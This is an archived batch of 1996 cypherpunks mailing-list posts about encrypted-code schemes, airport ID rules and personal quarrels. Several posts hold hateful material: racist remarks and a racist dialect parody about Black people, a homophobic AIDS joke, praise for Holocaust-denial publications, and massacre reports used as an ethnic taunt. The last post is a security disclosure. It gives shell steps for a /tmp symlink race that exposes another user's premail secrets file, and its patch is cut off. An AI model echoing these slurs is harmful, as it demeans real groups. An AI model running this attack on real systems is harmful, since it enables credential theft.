Date: Fri, 20 Dec 1996 16:46:04 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Executing Encrypted Code
In-Reply-To: <v02140b08aee0befb6cdb@[192.0.2.1]>
Message-ID: <l03010d04aee0d88d1498@[204.57.198.5]>
MIME-Version: 1.0
Content-Type: text/plain


>At 1:29 PM 12/20/1996, Bill Frantz wrote:
>>At 11:52 AM -0800 12/20/96, Peter Hendrickson wrote:
>>> If it's worthwhile having a backup processor around, then you just have
>>> to spend a little more to have backup software, too.
>
>> I thought your model was cheap processors and expensive software.  I.e.,.
>> The cost of the software is greater than the cost of the hardware.  Sounds
>> like more than just "a little more".
>
>There's no reason why one software package would cost more than the
>machine.  I was assuming you didn't need your whole software library
>to finish the report.
>
>I would expect software prices to drop because everybody using the software
>would be paying for it.  I would also expect more kinds of software to become
>available.

I doubt it- if everyone has no choice but to pay, why would software companies
lower prices? What would happen is a) less pirated software floating
around, and
b) software companies make much more money. I don't see prices coming down.

>At any rate, I just don't see this as a major problem.  Does anybody
>know how often processors break down these days?  My guess is that
>it is less common than getting into a car accident and much less common
>than all the other factors that make reports late.

It doesn't have to break.

Example: Advertising agency, each designer's machine has at least $10k worth
of software on it. We upgrade the machine, we have to spend another $10k to
buy new software, or go through administrative hassle with the vendor to
get 'new' copies of the software?

Speaking from a Sysadmin's perspective, I wouldn't use one if you gave me
the hardware for free. With this scheme, the programmers benefit, the
end-users don't, and it's the end-users who have to buy into this for it
to work.

[snip]







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Fri, 20 Dec 1996 15:26:04 -0800 (PST)
To: ph@netcom.com (Peter Hendrickson)
Subject: Re: Executing Encrypted Code
In-Reply-To: <v02140b08aee0befb6cdb@[192.0.2.1]>
Message-ID: <9612202325.AA00944@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


Peter Hendrickson writes:
>  I would expect software prices to drop because everybody using
>  the software would be paying for it.

I don't mean to sound rude or insult you personally, but this is utterly  
absurd.  If everyone is paying for the software then the company would be  
making even MORE money.  Only a fool would want to make less money!!  If money  
wasn't important to these people they wouldn't be in the business of selling  
software in the first place!

Aside from putting a gun to people's heads, the only thing that lowers prices  
is competition.

>  It is not out of the question for software vendors to sell
>  two versions of the same software.  One is the piracy-free
>  version and the other is the copy-as-much-as-you-can version.
>  I would expect the piracy-free version to be substantially
>  cheaper.

That would render the entire scheme pointless.  It only takes _____ONE_____  
copy of the software to get out for the whole world to pirate it.


andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: AwakenToMe@aol.com
Date: Fri, 20 Dec 1996 15:31:45 -0800 (PST)
To: cypherpunks@toad.com
Subject: re: Executing Encrypted Code
Message-ID: <961220182716_1955064746@emout02.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain



In a message dated 96-12-20 16:43:37 EST, you write:

<<   I would suppose that one could
 hack the code to find the counter, assuming you could decompile it (or
 wanted to). >>
Nope. Just a good debugger (Softice... Borland..etc)
And not to mention there's a billion disassemblers on the net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: AwakenToMe@aol.com
Date: Fri, 20 Dec 1996 15:33:22 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Flying on planes without ID
Message-ID: <961220182506_841828005@emout17.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 96-12-20 17:23:29 EST, you write:

<< Anyone have the current black-letter regulations? I'll have some time
 to kill over the holidays that might as well be used for civil 
 disobedience. What's likely to happen to me if I refuse to show ID? 
 Provide invalid ID, don't get caught, then publicize the fact? Provide 
 invalid ID and get caught? Or, better:
 
 "My wallet was stolen. The only ID I have on me is my ACLU membership 
 card and my PGP key. Can I still get on the plane?" >>

Well, something of the sort happened to me...
I didn't have my ID on me. (Delta airlines..) and they _WOULD_NOT_ let me on
the plane without the proper ID. I actually had lost my ID shortly before...
Then... A different time at the airport.. American airlines told me that If I
didn't have ID.. Id still be let on... just that the way they process my
baggage would be different ( I imagine they would physically look through
it...
                   Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: drose@AZStarNet.com
Date: Fri, 20 Dec 1996 17:39:58 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Credentials without Identity--Race Bits
Message-ID: <199612210139.SAA02134@web.azstarnet.com>
MIME-Version: 1.0
Content-Type: text/plain


aaron@herringn.com wrote:

>Flew down to LA recently with a firearm (checked, of course).
>
>Looking over the ticket later, I was mildly surprised to find "GUN" in
>a string of otherwise unintelligible text.

This is a case of damned if you do, damned if you don't. The last time that
I declared (as the legal notices at the check-in podium admonished me to do)
a firearm in my luggage, my bag sported a large, chromium yellow GUN tag
that also featured a graphic representation of a pistol (I guess for baggage
handlers who can't read, or can't read English, and would still like to take
advantage of one of the perks of their position).





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ph@netcom.com (Peter Hendrickson)
Date: Fri, 20 Dec 1996 19:06:38 -0800 (PST)
To: cypherpunks@toad.com
Subject: Instruction Sets which are tough to emulate
Message-ID: <v02140b00aee102e02f71@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


I'm guessing there are a bunch of ways to make a processor hard
to emulate.

For instance, you can make the registers 65 bits wide.

Can anybody think of some more?

Peter Hendrickson
ph@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Frantz <frantz@netcom.com>
Date: Fri, 20 Dec 1996 20:40:16 -0800 (PST)
To: Adam Shostack <vangelis@pnis.net (Vangelis)
Subject: Re: Credentials without Identity--Race Bits
In-Reply-To: <32BA5ABE.64F2@pnis.net>
Message-ID: <v03007800aee10b9e7ccd@[206.217.121.78]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:28 AM -0800 12/20/96, Adam Shostack wrote:
>Vangelis wrote:
>| Bill Stewart wrote:
>| > I've heard that in less civilized parts of the world you're actually
>| > required to carry government-issued ID cards to walk down the street
>| > or fly on airplanes.
>
>| Umm.. tried to get on a flight without having ID lately?  Doesn't work -
>| against policy.  Anti-terrorism policy and all.. it's for your own
>| safety, of course.
>
>	Yep.  Sucseeded, twice.  Once, having made jokes about
>smuggling cocaine.

A question for agent Kallestrom (sp?):  If TWA800 went down due to
mechanical failure (a spark blowing up the fuselage fuel tank), do we get
our freedoms back?


-------------------------------------------------------------------------
Bill Frantz       | I still read when I should | Periwinkle -- Consulting
(408)356-8506     | be doing something else.   | 16345 Englewood Ave.
frantz@netcom.com | It's a vice. - R. Heinlein | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Fri, 20 Dec 1996 19:53:10 -0800 (PST)
To: "Attila T. Hun" <attila@primenet.com>
Subject: Re: Life with Dale
In-Reply-To: <199612210144.SAA25029@infowest.com>
Message-ID: <32BB5ED3.4D1D@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Attila T. Hun wrote:
> ::>From: Dale Thorn <dthorn@gte.net>
> ::>I spent part of my growing up years in Leroy West Virginia, pop. :about 15,
> ::>give or take.  I know about hillbillies, and I know about guns.
> ::>If you had the impression I am a whiner, or that that defines me as a
> ::>person, you're about as clueful as the other old farts who attack people
> ::>they don't know anything about.

> ::Name one thing Dale has not experienced.

Amazing, isn't it?  Or maybe I shoulda said "ain't".  Ja' ever see the
movie Joe Versus The Volcano? The perfect movie, IMO, although c-punks
might not like that sort of thing.

Anyway, the girl is telling Tom Hanks on the boat "My dad says most people
go around all day in a fog (quote approximate), but the ones who are awake
are in a constant state of amazement".  Stick around.  When you get off
of the roller coaster, it's all over.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Fri, 20 Dec 1996 19:46:39 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Credentials without Identity--Race Bits
In-Reply-To: <199612210139.SAA02134@web.azstarnet.com>
Message-ID: <v03007800aee10ac1de5a@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:39 PM -0700 12/20/96, drose@AZStarNet.com wrote:
>aaron@herringn.com wrote:
>
>>Flew down to LA recently with a firearm (checked, of course).
>>
>>Looking over the ticket later, I was mildly surprised to find "GUN" in
>>a string of otherwise unintelligible text.
>
>This is a case of damned if you do, damned if you don't. The last time that
>I declared (as the legal notices at the check-in podium admonished me to do)
>a firearm in my luggage, my bag sported a large, chromium yellow GUN tag
>that also featured a graphic representation of a pistol (I guess for baggage
>handlers who can't read, or can't read English, and would still like to take
>advantage of one of the perks of their position).

And speaking of "damned if you do, damned if you don't," on a recent flight
from San Diego to San Jose I answered a ticketwoman's questions honestly.

She asked in a perfunctory manner if my bags had ever been out of my sight.
I answered honestly, that, yes, they had, but only briefly. She immediately
chirped up that my bags would have to be re-x-rayed. I followed her toward
the security point. She then asked how it was they'd been out of my sight.
I told her that the men's restroom had stalls that were far too tiny for
one's baggage, and that I'd placed my bags outside. She frowned, and seemed
confused by this. I averred that I had no idea if the women's restroom
stalls were larger, or if women simply placed their bags in the filth
behind the commode. She said nothing, but said "If we re-x-ray your bags,
can you promise me you won't do this again?" I politely told her no, that
the stalls were simply not large enough to accomodate carry-on luggage.
Then, I added helpfully, "but you won't really know, will you, so what's
the point?"

She froze just as we were about to enter the escalator down to the security
point, commanded me to remain in that spot, and went off to consult with
her security co-workers. After about 10 minutes, she and another Southwest
employee returned to where I was patiently standing, gave me a lecture on
how the measures were designed for my own protection, handed me a boarding
pass, and complimented me on my "honesty." (I suspect they had realized
then, if not long before, that the "Have your bags left your sight?"
question is ill-considered, given the design of restrooms, restaurants,
etc., and that most people were simply lying to them.)

As with most such situations, the laws don't catch the real terrorists.

(On a personal note, the woman whose office was on the other side of my
office, my last year or two at Intel, was killed when a PSA employee took a
handgun on a PSA flight, entered the cockpit, shot the pilot and co-pilot,
and caused the plane to plunge 35,000 feet into the hills near San Luis
Obispo. Her name was Karen Fox. So much for asking passenger-units to lie
about whether their bags ever left their sight for even a millisecond.)

Last note: I once agreed to fill out an "anonymous poll" given to me by
United Airlines as we awaited takeoff from Albuquerque, back in 1987. I
expressed my opinion that Allegis, the parent corporation of United at that
time, deserved to face financial ruin (I was pissed at the 2-hour delay on
the ground). My "anonymous poll" was apparently not so anonymous. I was met
in San Jose by four security heavies, who demanded to know what I "meant"
by my comments. I pointed out that my comments, whatever they were, were
promised to be "anonymous." They pressed me for an explanation and said I
would be arrested by airport police on grounds of making a threat unless I
explained. I yielded, and blathered about Allegis and its ill-founded
policies and how I believed the stock market would reward its stupidity
with a much lower share price, blah blah blah. They seemed to lack any
basis for throwing me in jail, so they let me go. That was the last time I
flew on United, by the way.

(I'm sure that had my ticket had the indication "GUN" somewhere in the
validation string, I'd've gotten even rougher attention. Citizen-units who
express independent opinions and who carry guns are dangerous to the Order.)

--Tim May



Just say "No" to "Big Brother Inside"
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Fri, 20 Dec 1996 19:56:47 -0800 (PST)
To: "Attila T. Hun" <attila@primenet.com>
Subject: Re: Life with Dale
In-Reply-To: <199612210144.SAA25029@infowest.com>
Message-ID: <32BB5FB1.5E0A@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Attila T. Hun wrote:
[snippo]
> ::Name one thing Dale has not experienced.

P.S.:  I haven't jumped out of a plane, or flown one yet, but I do
       have a picture of Jessica Dubroff on the wall over my desk.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Fri, 20 Dec 1996 19:55:24 -0800 (PST)
To: "Matthew J. Miszewski" <mjmiski@execpc.com>
Subject: Re: Ebonics
In-Reply-To: <3.0.32.19961220211505.006b95b0@mail.execpc.com>
Message-ID: <v03007801aee10fd61030@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:15 PM -0600 12/20/96, Matthew J. Miszewski wrote:

>Jesus Tim.  You're letting your lilly white show.
>
>-feeling-oppressed-by-every-law-in-existance-white-boy

Yeah, Matt, in a free society I wouldn't have to "speak Ebonics."

(Personally, I interviewed several folks while I was at Intel who could not
speak standard English. I recommended against their hiring, and they in
fact did not get invites to be interviewed at the main facilities. So much
for their jive talk habits.)

Understand, I have nothing against the colored people speaking "Ebonics" to
each other, or to anyone who'll listen. But I don't have to deal with this
nonsense, nor do I have to hire them.

(Until the People's Republic of Political Correctness demands that I
"justify" why not speaking standard English is a "valid job requirement,"
and refuses to take my "Because I say it is" as a valid answer. Not
surprisingly, the Clintonistas have decided to enter the Proposition 209
challenge on the side of the pro-discrimination side.)

If I were designing a genocidal program to destroy the colored race, I
would be pushing for Ebonics, for encouraging coloreds to study "Human
Potential" and "African History" instead of math, science, and engineering,
and pushing for hiring quotas.

--Tim May


Just say "No" to "Big Brother Inside"
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Fri, 20 Dec 1996 18:00:24 -0800 (PST)
To: cypherpunks@toad.com
Subject: Yiddish humor
Message-ID: <XuJ0yD24w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


How do you call a "cypher punk" without AIDS?

Gay gezund.

How do you call a "cypher punk" with AIDS?

Gay in drer.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Fri, 20 Dec 1996 20:39:45 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Life with Dale
In-Reply-To: <199612210144.SAA25029@infowest.com>
Message-ID: <v03007800aee11abb9f9e@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:55 PM -0800 12/20/96, Dale Thorn wrote:
>Attila T. Hun wrote:
>[snippo]
>> ::Name one thing Dale has not experienced.
>
>P.S.:  I haven't jumped out of a plane, or flown one yet, but I do
>       have a picture of Jessica Dubroff on the wall over my desk.

My stock broker worked with her pilot, who worked in the same brokerage
office in Palo Alto.

And, interestingly, the Cypherpunks had a big beach party between Pescadero
(where Dubroff lived) and Half Moon Bay (where she flew out of) just a
couple of days prior to her departure. (This was the beach party put
together by Doug Barnes, last spring.)

Her dingbat newage mother claimed that "Jessica is happier now." Yeah, what
was left of her in the wreckage is happier now, rotting in a grave
somewhere north of me.

Dale probably has a picture of her above his desk to remind him of why he
supports the "license to breed" proposal.

(Not an altogether surprising sentiment, but one has to wonder just why
Dale would be on a list such as this one, given his politics.)

--Tim May



Just say "No" to "Big Brother Inside"
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Fri, 20 Dec 1996 18:22:14 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Credentials without Identity--Race Bits
In-Reply-To: <32BA5ABE.64F2@pnis.net>
Message-ID: <aak0yD25w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Vangelis <vangelis@pnis.net> writes:

> Bill Stewart wrote:
> > I've heard that in less civilized parts of the world you're actually
> > required to carry government-issued ID cards to walk down the street
> > or fly on airplanes.
>
> Umm.. tried to get on a flight without having ID lately?  Doesn't work -
> against policy.  Anti-terrorism policy and all.. it's for your own
> safety, of course.

It's funny that this particulae piece of fascist regulation was imposed
by the Klintons after the TWA 800 crash. Now the most likely reasons for
the crash are supposedly a mechanical failure or a U.S.missile - not any
terrorists. But once the fascists gain some ground, they don't give it back.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Fri, 20 Dec 1996 18:20:31 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Credentials without Identity--Race Bits
In-Reply-To: <v03007800aee07e16a6b5@[207.167.93.63]>
Message-ID: <6gk0yD26w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Timothy C. May" <tcmay@got.net> writes:

> (Note: To a lot of us, even seeing the English form "I've heard that in
> less civilized countries...." is almost a direct cue that a facetious
> (tongue in cheek, ironic, etc.) remark is about to follow.)
>
> I've heard that in less civilized countries, the same cues for irony may
> not be widely known.

Why is the fascist United State of America considered a "civilized country"?

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blanc Weber <blancw@microsoft.com>
Date: Fri, 20 Dec 1996 21:11:16 -0800 (PST)
To: "'cypherpunks@toad.com>
Subject: RE: Life with Dale
Message-ID: <c=US%a=_%p=msft%l=RED-81-MSG-961221050926Z-56328@INET-03-IMC.itg.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


From:	Timothy C. May

[.....]what was left of her [is] rotting in a grave somewhere north of
me.
.......

[...] interestingly, the Cypherpunks had a big beach party between
Pescadero (where Dubroff lived) and Half Moon Bay (where she flew out
of) just a couple of days prior to her departure. (This was the beach
party put together by Doug Barnes, last spring.)
.......................................................

	Coincidence?

   ..
Blanc <g>

>
>
>
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Fri, 20 Dec 1996 21:12:15 -0800 (PST)
To: Rich Graves <rcgraves@disposable.com>
Subject: Re: Dale defends free society from the NSApunks (was Re: Encryption ?
In-Reply-To: <199612201325.OAA03035@basement.replay.com>
Message-ID: <32BB7144.3A8A@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Rich Graves wrote:
> Stop bashing Dale, you ADL/CFR/NSA thought police, you.
> Name Withheld by Request wrote:
> > I thought this was so funny I've saved it.
> > Perhaps we could vote on the quality of Dale's ideas and arrive
> > at an estimate of the proportion of NSA supporters on the list.

Critical thinking is hard enough, then having to research and document
your findings and get someone or someplace to distribute them, well,
it's too hard for most folks.

So most folks fall into these camps (or others perhaps):

Those who accept the conventional wisdom, i.e., Oswald did it, or,
Nurnberg was a real showdown, where the world got justice for the
Nazi atrocities.

Those who oppose the conventional wisdom with truly unsubstantiated
conspiracy theories:  Karen Silkwood was programmed to drive off the
road by a psychotronic computer located in Brussels which uses satellites
to send the beams of energy to the victims' brains.

Doing the hard work is not only hard, but depressing when nobody reads
it.  Probably a lot of people find the IHR (formerly Carto) publications
more interesting than the rather mindless crap put out by the ADL, to
name an example.

Telling people about the Holocaust ad nauseam here in 1996, which the
L.A. Times for instance does a lot, doesn't accomplish what I believe
is the stated objective, i.e., to prevent a reoccurence, not only against
Jews, but against all so-called undesirables.

Cypherpunks are not the only people who give plausible argument against
interference in places like Bosnia, but the fact that they do, and that
mass killings are still sanctioned for all sorts of erstwhile valid and/
or practical reasons, puts a serious challenge to the Holocaust promoters:
What exactly are you trying to do?

If Albert Einstein can promote the A-bomb to the President, knowing it
will kill hundreds of thousands of erstwhile innocent people at a single
burst, what is the point of continuing the propaganda?  To finance more
bombs so we can kill more Hitler supporters?  Sadaam was compared to
Hitler, but Ramsey Clark didn't buy it.  Lots of people who made lots
of money investing in Nazi Germany are still selling well in the U.S.
Know any Jews who drive Fords? Read the Int'l Jew crap by Henry Himself.

Look at the Godfather movie when Al Pacino is walking through the town
in Sicily, and there are no men to be seen.  He says "Where are all the
men?", and the girl with him says "ALL DEAD - died in vendettas".





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Matthew J. Miszewski" <mjmiski@execpc.com>
Date: Fri, 20 Dec 1996 19:16:15 -0800 (PST)
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Ebonics
Message-ID: <3.0.32.19961220211505.006b95b0@mail.execpc.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:29 AM 12/20/96 -0800, Timothy C. May wrote:
(snip)
>De honks be chimin.' Code be fly! I's huffa be gots to be sizing, bitch.
>PGP 3 be dope, nuffin but bad!
>
>I be axing you if it be outa honkeyland or outa Afrika? Dat bitch Reno be
>sayin' it be 'legal be usin' dope 'warez. Day be hos.

Jesus Tim.  You're letting your lilly white show.  

-feeling-oppressed-by-every-law-in-existance-white-boy

Matt






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Fri, 20 Dec 1996 18:40:26 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Pretty Lousy Privacy
In-Reply-To: <32BA9300.1716@sk.sympatico.ca>
Message-ID: <aVL0yD28w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Carl Johnson <toto@sk.sympatico.ca> writes:

> Alec wrote:
> > How soon can we expect Turkish and Armenian language modules for this beta?
>
> Alec,
>   All of our Turkish programmers are dead.  All of our Armenian
> programmers'
> keyboards are screwed because of the blood dripping off of their fingers.

You may well be right. Were any of the Azeri civilians murdered by
Armenians in Khojaly computer programmers? Are any of their killers
presently employed by Earthweb as associate network administrators?


_Newsweek_ 16 March 1992

By Pascal Privat with Steve Le Vine in Moscow


             THE FACE OF A MASSACRE

Azerbaijan was a charnel house again last week:  a  place
of  mourning  refugees  and  dozens  of  mangled  corpses
dragged  to  a  makeshift morgue behind the mosque.  They
were  ordinary  Azerbaijani men, women  and  children  of
Khojaly, a  small village  in  war-torn  Nagorno-Karabakh
overrun  by  Armenian  forces on Feb.  25-26.  Many  were
killed  at  close range while trying to  flee;  some  had
their  faces  mutilated, others were scalped.  While  the
victims' families mourned,

Photo: `We will never forgive the Armenians': Azeri woman
       mourn a victim.




_The New York Times_, Tuesday, March 3, 1992


                    MASSACRE BY ARMENIANS

Agdam, Azerbaijan, March 2 (Reuters) - Fresh evidence emerged
today of a massacre of civilians by Armenian militants in
Nagorno-Karabakh, a predominantly Armenian enclave of Azerbaijan.

                         Scalping Reported

Azerbaijani officials and journalists who flew briefly to the region
by helicopter brought back three dead children with the back of their
heads blown off. They said shooting by Armenians has prevented them
from retrieving more bodies.

"Women and children have been scalped," said Assad Faradshev, an aide
to Nagorno-Karabakh's Azerbaijani Governor. "When we began to pick up
bodies, they began firing at us."

The Azerbaijani militia chief in Agdam, Rashid Mamedov, said: "The
bodies are lying there like flocks of sheep. Even the fascists did
nothing like this."

                         Truckloads of Bodies

Near Agdam on the outskirts of Nagorno-Karabakh, a Reuters photographer,
Frederique Lengaigne, said she had seen two trucks filled with Azerbaijani
bodies.

"In the first one I counted 35, and it looked as though there were as
many in the second," she said. "Some had their head cut off, and many
had been burned. They were all men, and a few had been wearing khaki
uniforms."




_The Sunday Times_ 1 March 1992

By Thomas Goltz, Agdam, Azerbaijan


    ARMENIAN SOLDIERS MASSACRE HUNDREDS OF FLEEING FAMILIES

Survivors reported that Armenian soldiers shot and bayoneted more
than 450 Azeris, many of them women and children. Hundreds, possibly
thousands, were missing and feared dead.

The attackers killed most of the soldiers and volunteers defending
the women and children. They then turned their guns on the terrified
refugees. The few survivors later described what happened: 'That's
when the real slaughter began,' said Azer Hajiev, one of three soldiers
to survive. 'The Armenians just shot and shot. And then they came in
and started carving up people with their bayonets and knives.'

'They were shooting, shooting, shooting,' echoed Rasia Aslanova, who
arrived in Agdam with other women and children who made their way
through Armenian lines. She said her husband, Kayun, and a son-in-law
were massacred in front of her. Her daughter was still missing.

One boy who arrived in Agdam had an ear sliced off.

The survivors said 2000 others, some of whom had fled separately,
were still missing in the gruelling terrain; many could perish from
their wounds or the cold.

By late yesterday, 479 deaths had been registered at the morgue in
Agdam's morgue, and 29 bodies had been buried in the cemetery. Of
the seven corpses I saw awaiting burial, two were children and three
were women, one shot through the chest at point blank range.

Agdam hospital was a scene of carnage and terror. Doctors said they
had 140 patients who escaped slaughter, most with bullet injuries or
deep stab wounds.

Nor were they safe in Agdam. On friday night rockets fell on the city
which has a population of 150,000, destroying several buildings and
killing one person.



_The Times_ 2 March 1992

              CORPSES LITTER HILLS IN KARABAKH

   (ANATOL LIEVEN COMES UNDER FIRE WHILE FLYING TO INVESTIGATE
       THE MASS KILLINGS OF REFUGEES BY ARMENIAN TROOPS)

As we swooped low over the snow-covered hills of Nagorno-Karabagh
we saw the scattered corpses. Apparently, the refugees had been
shot down as they ran. An Azerbaijani film of the places we flew
over, shown to journalists afterwards, showed DOZENS OF CORPSES
lying in various parts of the hills.

The Azerbaijanis claim that AS MANY AS 1000 have died in a MASS
KILLING of AZERBAIJANIS fleeing from the town of Khodjaly, seized
by Armenians last week. A further 4,000 are believed to be wounded,
frozen to death or missing.

The civilian helicopter's job was to land in the mountains and pick
up bodies at sites of the mass killings.

The civilian helicopter picked up four corpses, and it was during
this and a previous mission that an Azerbaijani cameraman filmed
the several dozen bodies on the hillsides.

Back at the airfield in Agdam, we took a look at the bodies the
civilian helicopter had picked up. Two old men a small girl were
covered with blood, their limbs contorted by the cold and rigor
mortis. They had been shot.




_TIME_ March 16, 1992


By Jill SMOLOWE

-Reported by Yuri ZARAKHOVICH/Moscow


          M A S S A C R E  I N  K H O J A L Y

While the details are argued, this much is plain: something grim
and unconscionable happened in the Azerbaijani town of Khojaly
two weeks ago. So far, some 200 dead Azerbaijanis, many of them
mutilated, have been transported out of the town tucked inside
the Armenian-dominated enclave of Nagorno-Karabakh for burial in
neighboring Azerbaijan. The total number of deaths - the Azerbaijanis
claim 1,324 civilians have been slaughtered, most of them women and
children - is unknown.

Videotapes circulated by the Azerbaijanis include images of defaced
civilians, some of them scalped, others shot in the head.




_BBC1 Morning News at 07.37, Tuesday 3 March 1992_

BBC reporter was live on line and he claimed that he saw more
than 100 bodies of Azeri men, women and children as well as a
baby who are shot dead from their heads from a very short distance.

_BBC1 Morning News at 08:12, Tuesday 3 March 1992_

Very disturbing picture has shown that many civilian corpses
who were picked up from mountain. Reporter said he, cameraman
and Western Journalists have seen more than 100 corpses, who
are men, women, children, massacred by Armenians. They have
been shot dead from their heads as close as 1 meter. Picture
also has shown nearly ten bodies (mainly women and children)
are shot dead from their heads. Azerbaijan claimed that more
than 1000 civilians massacred by Armenian forces.

_Channel 4 News at 19.00, Monday 2 March 1992_

2 French journalists have seen 32 corpses of men, women and
children in civilian clothes. Many of them shot dead from
their heads as close as less than 1 meter.


_Report from Karabakpress_

A merciless massacre of the civilian population of the small
Azeri town of Khojali (Population 6000) in Karabagh, Azerbaijan,
is reported to have taken place on the night of February 28 by
the Soviet Armenian Army. Close to 1000 people are reported to
have been massacred. Elderly and children were not spared. Many
were badly beaten and shot at close range. A sense of rage and
helplessness has overwhelmed the Azeri population in face of the
well armed and equipped Armenian Army. The neighboring Azeri city
of Aghdam outside of the Karabagh region has come under heavy
Armenian artillery shelling. City hospital was hit and two pregnant
women as well as a new born infant were killed. Azerbaijan is appealing
to the international community to condemn such barbaric and ruthless
attacks on its population and its sovereignty.


---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mixmaster <lucifer@dhp.com>
Date: Fri, 20 Dec 1996 18:50:29 -0800 (PST)
To: cypherpunks@toad.com
Subject: Security hole in premail
Message-ID: <199612210235.VAA03805@dhp.com>
MIME-Version: 1.0
Content-Type: text/plain


There's a pretty nasty bug in premail that allows any non-root to obtain the
contents of the premail secrets file.  This is a race condition that can be
exploited because an indefinite amount of time can pass between the time that
premail checks if the secrets file exists and when it tries to write to the
file.  It can be exploited as follows:

attacker:

$ umask 111
$ ln -s ~/premail-secrets-file /tmp/.premail-secrets.$<

normal user:

$ premail -login
Remember to logout when done.
Your premail passphrase, please:

All the attacker has to do is execute "touch premail-secrets-file" between the
time that the user is prompted for the passphrase and the time when the login
is completed.

$ ls -al premail-secrets-file
-rw-rw-rw-   1 d00d    nogroup          19 Dec 20 19:01 premail-secrets-file 
$ cat premail-secrets-file
[contents of premail secrets file]

This bug can be fixed in two ways.  One way is to set the premail-secrets
setting to some non-world-writable directory.  The second way is to apply the
following patch:

*** premail.orig	Fri Dec 20 18:46:01 1996
--- premail	Fri Dec 20 18:55:54 1996
***************
*** 3574,3579 ****
--- 3574,3582 ----
      }
      for ($triesleft = 2; !$done && $triesleft; $triesleft--) {
